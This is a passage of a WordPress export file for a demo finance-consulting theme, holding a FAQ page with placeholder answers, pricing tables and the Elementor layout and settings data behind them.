i:3;s:11:"css_classes";i:3;}}s:5:"style";a:1:{s:18:"section_background";a:6:{s:21:"background_background";i:4;s:16:"background_color";i:1;s:16:"background_image";i:3;s:19:"background_position";i:3;s:17:"background_repeat";i:3;s:15:"background_size";i:3;}}}}s:9:"iflip_box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"image_box";i:3;s:4:"link";i:3;s:6:"number";i:2;s:5:"title";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}s:5:"style";a:2:{s:21:"style_overlay_section";a:1:{s:10:"overlay_bg";i:3;}s:21:"style_content_section";a:1:{s:26:"title_typography_font_size";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:3;}}s:5:"style";a:2:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}s:18:"style_text_section";a:2:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;}}}}s:9:"itabtitle";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:11:"title_boxes";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:12:"radius_title";i:1;s:8:"title_bg";i:1;s:18:"title_active_color";i:1;s:15:"title_active_bg";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:4;s:10:"image_size";i:4;s:12:"align_tablet";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:3:{s:32:"image_box_shadow_box_shadow_type";i:3;s:27:"image_box_shadow_box_shadow";i:3;s:19:"image_border_radius";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}}}s:8:"icon-box";a:3:{s:5:"count";i:6;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:5:{s:13:"selected_icon";i:6;s:10:"title_text";i:6;s:16:"description_text";i:6;s:8:"position";i:6;s:10:"title_size";i:6;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:6;s:10:"icon_space";i:6;s:9:"icon_size";i:6;s:6:"rotate";i:6;}s:21:"section_style_content";a:10:{s:18:"title_bottom_space";i:6;s:11:"title_color";i:6;s:27:"title_typography_typography";i:6;s:28:"title_typography_font_family";i:6;s:28:"title_typography_line_height";i:6;s:17:"description_color";i:6;s:33:"description_typography_typography";i:6;s:34:"description_typography_font_family";i:6;s:34:"description_typography_font_weight";i:6;s:26:"title_typography_font_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:6;}}}}s:7:"ibutton";a:3:{s:5:"count";i:3;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:1:{s:4:"text";i:3;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}s:5:"style";a:2:{s:11:"style_title";a:5:{s:8:"bg_title";i:1;s:11:"title_color";i:1;s:12:"title_border";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;}s:13:"style_content";a:4:{s:10:"bg_content";i:1;s:13:"content_color";i:1;s:29:"content_typography_typography";i:1;s:35:"content_typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:12:"testi_slider";i:1;s:6:"arrows";i:1;s:4:"dots";i:1;s:4:"loop";i:1;}}s:5:"style";a:2:{s:9:"style_nav";a:1:{s:13:"arrow_spacing";i:1;}s:11:"style_tinfo";a:2:{s:26:"name_typography_typography";i:1;s:27:"name_typography_font_weight";i:1;}}}}s:11:"google_maps";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:11:"section_map";a:2:{s:7:"address";i:1;s:6:"height";i:1;}}s:5:"style";a:1:{s:17:"section_map_style";a:2:{s:22:"css_filters_css_filter";i:1;s:20:"css_filters_saturate";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>FAQs</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/faqs/</link>
		<pubDate>Tue, 08 Sep 2020 09:22:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=566</guid>
		<description></description>
		<content:encoded><![CDATA[faqs	        <h3>Most Popular Questions</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				In what areas do you provide management consulting? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				In which countries do you provide consulting services? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				How is a consulting project started and organized? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				Do you do fixed price or time and materials contracts? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				Do you offer volume or loyalty discounts? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				What problems does business consulting typically solve? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				How is the scope of a consulting project determined? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				How long does a business consulting project last? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
			<h2>Looking for a First-Class Finance Firm?</h2>		
		<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/contact-us">get in touch</a>
	        flexible pricing plans	        <h3>Choose The Best Plan</h3>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
            Billed Monthly
                <label>
                    <input type="checkbox">
                </label>
			Billed Yearly
				<h6>basic plan</h6>				<h2><sup>$</sup> 69</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 79</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 89</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>basic plan</h6>				<h2><sup>$</sup> 699</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 799</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 899</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
		        <a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06-1.svg" alt=""></figure></a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>566</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:22:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:22:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[faqs]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[567]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"1fad6c2","elType":"section","settings":{"padding":{"unit":"px","top":"117","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"cfef8fb","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b29ca39","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3d04547","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"ba86566","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"4865c99","elType":"widget","settings":{"sub":"faqs","title":"Most Popular Questions","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#52C5B6","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"f714140","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"af5bfe2","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0e107ea","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"531351e","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"2e8ff7b","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"b0dc727"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"b4483e5"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"f24ea6d"},{"acc_title":"Do you do fixed price or time and materials contracts?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.<\/p>","_id":"ceccd71"}],"_padding":{"unit":"px","top":"0","right":"10","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":true},{"id":"a627a5f","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"8463953","elType":"widget","settings":{"ot_accs":[{"acc_title":"Do you offer volume or loyalty discounts?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"b0dc727"},{"acc_title":"What problems does business consulting typically solve?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"5b50501"},{"acc_title":"How is the scope of a consulting project determined?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"2928abe"},{"acc_title":"How long does a business consulting project last?","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"f4ae810"}],"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"10","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"84019eb","elType":"section","settings":{"gap":"extended","structure":"22","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-faq.jpg","id":571},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"82","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"content_position":"middle"},"elements":[{"id":"6f925c9","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"70c78a1","elType":"widget","settings":{"title":"Looking for a First-Class Finance Firm?","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":40,"sizes":[]},"typography_font_weight":"400","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"a41d7e6","elType":"widget","settings":{"editor":"<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.<\/p>","text_color":"#FFFFFF","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"152805f","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"c53e4ac","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contact-us","is_external":"","nofollow":"","custom_attributes":""},"_padding":{"unit":"px","top":"5","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"dcefd1a","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-faq.jpg","id":574},"background_position":"top center","background_repeat":"no-repeat","padding":{"unit":"px","top":"100","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a866378","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3d64e18","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2d57f68","elType":"column","settings":{"_column_size":33,"_inline_size":23,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"2e06ec7","elType":"column","settings":{"_column_size":33,"_inline_size":53.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"c669db8","elType":"widget","settings":{"sub":"flexible pricing plans","title":"Choose The Best Plan","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#FFFFFF","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"7255b73","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","align":"center","text_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"48","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"51bfab0","elType":"widget","settings":{"title_left":"Billed Monthly","title_right":"Billed Yearly","title_color":"#FFFFFF","toggle_bg":"#FFFFFF33"},"elements":[],"widgetType":"iswitcher"}],"isInner":true},{"id":"06865b6","elType":"column","settings":{"_column_size":33,"_inline_size":23,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"04bd296","elType":"section","settings":{"gap":"extended","structure":"30","css_classes":"monthly","layout":"full_width"},"elements":[{"id":"75f58b9","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5d1e07a","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 69","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"a910be5","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"14789ad","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 79","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"a5e277a","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"4f90658","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 89","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true},{"id":"e676d1e","elType":"section","settings":{"gap":"extended","structure":"30","css_classes":"yearly","layout":"full_width"},"elements":[{"id":"9729d97","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"194320d","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 699","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"88ccea0","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"148d950","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 799","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"d27a889","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"4fc8771","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 899","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"5ef0e76","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"789c4a0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b5a1c52","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":583},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":584},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":585},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":586},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":587},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":588},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom","img_css_filters_hover_brightness":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:6:"column";a:3:{s:5:"count";i:19;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:19;s:19:"_inline_size_tablet";i:12;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:8:{s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:28:"stitle_typography_typography";i:2;s:27:"stitle_typography_font_size";i:2;s:12:"stitle_color";i:2;s:29:"stitle_typography_font_weight";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:2;s:10:"text_color";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:6;}s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:5;s:16:"content_position";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;s:11:"css_classes";i:2;}}s:5:"style";a:1:{s:18:"section_background";a:5:{s:21:"background_background";i:2;s:16:"background_image";i:2;s:19:"background_position";i:2;s:17:"background_repeat";i:2;s:15:"background_size";i:1;}}